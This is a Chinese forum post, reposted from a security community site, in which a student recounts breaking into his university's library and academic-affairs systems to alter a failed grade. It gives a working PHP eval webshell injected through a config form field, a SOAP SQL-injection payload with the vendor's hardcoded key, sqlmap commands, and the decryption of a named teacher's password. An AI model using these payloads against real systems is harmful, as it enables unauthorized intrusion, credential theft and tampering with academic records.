那真是一个悲伤的故事。

　　我始终不明白我一个计算机网络专业的学生为什么要学电路，修电脑吗！！那么坑的课，也可能是我逃课次数太多，看我不爽。但是，有一个逃课比我多的孩子，老师给了60分，竟然过了，过了，特么过了。。。

　　这我就不开心了。呵呵。

　　事件经历

　　学校主站给教务查询系统加了一个链接，但通过此处打开教务处，页面全是静态，不能很好的进行测试。猜想在内网内可以，通过教务地址访问。

　　于是转移目标，先来从图书馆下手，等拿下图书馆，从图书馆代理过去搞。

　　图书馆乃开源的汇文图书管理系统，敏感信息泄露，呵呵哒：

　　文件包含漏洞：

　　登入之后这边可以看到当前连接的数据库的一些信息：

　　至此我们可以随意修改图书管理系统的配置。

　　根据开源代码分析，发现更新配置时代码未做过滤，

　　这样我们可以再在配置文件里插入任意内容，我们可以配置文件里追加一句话；在配置全文索引文件夹路径时，修改

　　c:/hwopac/index/

　　为

　　c:/hwopac/index/";@eval($_POST['123']);//

　　更新过配置后，内容保存在的配置文件为：

　　/include/hwopacpwd.php

　　于是连接`URL+/include/hwopacpwd.php`即可得到一句话webshell。

　　下面两个图片是在乌云看到的案例：

　　然而，我们学校图书馆的更新页面却是这样：

　　握草，怎么会这样。那还真是个悲伤的故事。。。

　　猜想是运维人员在乌云看到相关案例，删除了该表单。表单被删，貌似无解。

　　后来抽根烟想了想，能不能去网上找一个一样的系统，然后抓取修改那个修改的POST表单，google了一番，没找到可以利用的。

　　于是想到自己在页面构造添加表单，如下图的文本输入框：

　　审查元素插入如下标签：

　　<dd><input size="20" name="fulltextPath" value="c:/hwopac/index/";@eval($_POST['123']);//" type="text"></dd

　　此处的表单name值是通过源码审计看到的，案例中也有提现。

　　我们提交表单抓POST包，发现`fulltextPath`的值已经被提交：

　　测试连接`/include/hwopacpwd.php`,没有连接上:

　　我们再来看下这个图，仔细看，

　　你会发现其实不只是`fulltextPath`的值没有被加密，`user`的值也没有加密，同样可以被替换，于是淫荡的思路来了：

　　`POST`表单`user`值填写为：

　　libsys";@eval($_POST['123']);//

　　提交之后，即可菜刀连接`/include/hwopacpwd.php`，GOOD JOB！

　　恶意代码确实如此写入：

　　提权略过，直接`SYSTEM`:

　　教务系统部署在内网的某台机器，为了防止外部攻击，他们做了一个外部的接口，所有页面静态化，很是蛋疼，我使用上述图书馆的机器对内网的教务机器进行了一通扫描，终于找到了他的实际地址：

　　正方教务系统同样提供了各类查询接口，我此处利用`service.asmx`的`BMCheckPassword`接口的注入：

　　官方给出了如下规范的POST数据包：

　　POST /service.asmx HTTP/1.1

　　Host: [url]www.baidu.com[/url]

　　Content-Type: text/xml; charset=utf-8

　　Content-Length: 784

　　SOAPAction: "https://www.zf_webservice.com/BMCheckPassword"

　　<?xml version="1.0" encoding="utf-8"?>

　　<soap:Envelope xmlns:xsi="https://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="https://www.w3.org/2001/XMLSchema" xmlns:soapenc="https://schemas.xmlsoap.org/soap/encoding/" xmlns:tns="https://tempuri.org/" xmlns:types="https://tempuri.org/encodedTypes" xmlns:soap="https://schemas.xmlsoap.org/soap/envelope/">

　　<soap:Body soap:encodingStyle="https://schemas.xmlsoap.org/soap/encoding/">

　　<q1:BMCheckPassword xmlns:q1="https://www.zf_webservice.com/BMCheckPassword">

　　<strYHM xsi:type="xsd:string">string</strYHM>

　　<strPassword xsi:type="xsd:string">string</strPassword>

　　<xh xsi:type="xsd:string">string</xh>

　　<strKey xsi:type="xsd:string">KKKGZ2312</strKey>

　　</q1:BMCheckPassword>

　　</soap:Body>

　　</soap:Envelope>

　　上述`sKey = "KKKGZ2312"`为常量，有了`sKey`就可以去查询一些接口了。

　　`strYHM`表示用户名，我已经吓哭，好像都是用拼音:

　　此处没做过滤，直接构造语句使用Intruder模块：

　　jwc01' and (SELECT SUBSTR(TO_CHAR(KL),1,1) from yhb where yhm='jwc01')='a`

　　payoad`为:`a-z`、`A-Z`、`0-9`、`~!@#$%^&*()_+[]{}|<>:"';`

　　不知为何用BurpSuite跑起来很慢。。

　　我把POST数据包复制出来交给SQLMAP：

　　python sqlmap.py -r post.txt

　　GOOD JOB!

　　[14:31:40] [INFO] fetching tables for databases: 'CTXSYS, DBSNMP, DMSYS, EXFSYS, MDSYS, OLAPSYS, ORDSYS, OUTLN, SCOTT, SYS, SYSMAN, SYSTEM, TSMSYS, WMSYS, XDB, ZFXFZB'

　　[14:31:40] [INFO] the SQL query used returns 3389 entries

　　那么问题来了，几千个表，怎么找教师用户密码的表？幸亏我拼音好：

　　我挂科的是电子电工，老师叫张X，姓名对应的字段为XM，这拼音拼的啊。。。

　　这就好办了，用`--sql-shell`查询:

　　select * from "YHB" where XM = '张X';

　　恩~，得到密文为`U_rBKJ`，这是经过正方的特殊加密的，我们用python脚本解开：

　　promote pythonDemo v5est0r$ python zhengfang.py "U_rBKJ"Password: 716822

　　`Password: 716822`

　　接着登入该老师的教务系统，录入成绩。。。

　　录入成绩需要密码，密码？？？ 我根据官方给出的录入成绩密码字段没查到密码啊。。。空的也不行。

　　不急，慢慢来。

　　太悲伤了，补考估计也会挂掉，太悲伤了。

　　作者：Binghe

　　来源：i春秋社区

　　链接：https://bbs.ichunqiu.com/thread-18011-1-1.html

炼石信息安全培训春季班开招

QQ：495066536

372806985

敬请持续关注……